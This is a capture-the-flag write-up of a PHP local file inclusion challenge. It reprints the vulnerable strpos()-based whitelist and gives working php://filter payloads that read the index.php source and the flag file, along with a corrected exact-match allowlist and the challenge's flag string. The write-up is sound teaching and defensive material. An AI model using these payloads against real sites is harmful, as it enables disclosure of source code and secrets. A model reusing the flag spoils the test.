BUUCTF Web [BSidesCF 2020]Had a bad day1
Start the target machine, open Burp, click WOOFERS and capture the request.
The request carries a category parameter whose value is meowers; append a ' to it to test.
The error message shows that the category parameter is concatenated with .php and then passed to a file include.
Try passing flag directly.
The response shows that a whitelist is enforced: only woofers and meowers are accepted. We cannot tell how the filter works, so we use the php://filter wrapper to read the source of index.php.
Construct the payload:
?category=php://filter/read=convert.base64-encode/resource=index
Paste the encoded output into a base64 decoder
to obtain the source:
<html>
<head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="description" content="Images that spark joy"><meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0"><title>Had a bad day?</title><link rel="stylesheet" href="css/material.min.css"><link rel="stylesheet" href="css/style.css"></head>
<body>
<div class="page-layout mdl-layout mdl-layout--fixed-header mdl-js-layout mdl-color--grey-100">
<header class="page-header mdl-layout__header mdl-layout__header--scroll mdl-color--grey-100 mdl-color-text--grey-800"><div class="mdl-layout__header-row"><span class="mdl-layout-title">Had a bad day?</span><div class="mdl-layout-spacer"></div><div></header>
<div class="page-ribbon"></div>
<main class="page-main mdl-layout__content"><div class="page-container mdl-grid"><div class="mdl-cell mdl-cell--2-col mdl-cell--hide-tablet mdl-cell--hide-phone"></div>
<div class="page-content mdl-color--white mdl-shadow--4dp content mdl-color-text--grey-800 mdl-cell mdl-cell--8-col"><div class="page-crumbs mdl-color-text--grey-500"></div>
<h3>Cheer up!</h3>
<p>Did you have a bad day? Did things not go your way today? Are you feeling down? Pick an option and let the adorable images cheer you up!</p>
<div class="page-include">
<?php
$file = $_GET['category'];
if(isset($file)){
    if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
        include ($file . '.php');
    }else{
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
</div>
<form action="index.php" method="get" id="choice"><center>
<button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
<button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
</center></form>
</div></div></main></div>
<script src="js/material.min.js"></script>
</body>
</html>
Focus on the PHP part:
<?php
$file = $_GET['category'];
if(isset($file)){
    if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
        include ($file . '.php');
    }else{
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
Code audit: the check only uses strpos(), so any category value that merely contains woofers, meowers or index passes, and the whole value is then concatenated with .php and included.
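The fix for this class of bug is to stop treating "contains an allowed word" as authorization and to compare the whole parameter against a fixed map of allowed pages. The following is an added example written for this writeup, not the challenge's own code; the file names woofers.php and meowers.php and the helper name resolveCategory are assumptions. It rejects both payloads used above because neither is exactly equal to an allowed key, and the path that reaches include comes from the constant, never from the raw request.

```php
<?php
// Added example, not part of the challenge. The original index.php accepts any
// value that *contains* "woofers", "meowers" or "index" (a strpos() substring
// check), so a php://filter wrapper with one of those words embedded in it
// passes and reaches include(). Here the whole value must match a known key.

// Assumed file names: the allowlist maps a request value to a fixed page.
const CATEGORY_PAGES = [
    'woofers' => 'woofers.php',
    'meowers' => 'meowers.php',
];

/**
 * Resolve a requested category to the path of the page to include.
 * Returns null for anything that is not exactly one of the allowed keys,
 * including arrays (category[]=x), wrappers such as php://filter/..., and
 * values that merely contain an allowed word.
 */
function resolveCategory($category): ?string
{
    // $_GET values may be arrays; only plain strings are considered.
    if (!is_string($category)) {
        return null;
    }
    // Whole-value lookup: "php://filter/read=convert.base64-encode/index/resource=flag"
    // is not a key, so it is rejected instead of being concatenated with ".php".
    if (!array_key_exists($category, CATEGORY_PAGES)) {
        return null;
    }
    // The included path is built from our own constant, not from user input.
    return __DIR__ . '/' . CATEGORY_PAGES[$category];
}

$file = resolveCategory($_GET['category'] ?? null);
if ($file === null) {
    // Same user-facing message as the original; the rejected raw value can be
    // logged server-side to spot wrapper or traversal probing.
    echo "Sorry, we currently only support woofers and meowers.";
} else {
    include $file;
}
```

With this version, ?category=woofers and ?category=meowers behave as before, while ?category=php://filter/read=convert.base64-encode/resource=index and the nested ...index/resource=flag payload both fall through to the error message, because array_key_exists compares the full string rather than searching for a substring.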
Construct the payload:
?category=php://filter/read=convert.base64-encode/index/resource=flag
The index in it can be replaced by woofers or meowers; all three work.
Paste the encoded output into an online base64 decoder
to get the flag: flag{b111264b-fc14-4697-afbc-00a7a143c670}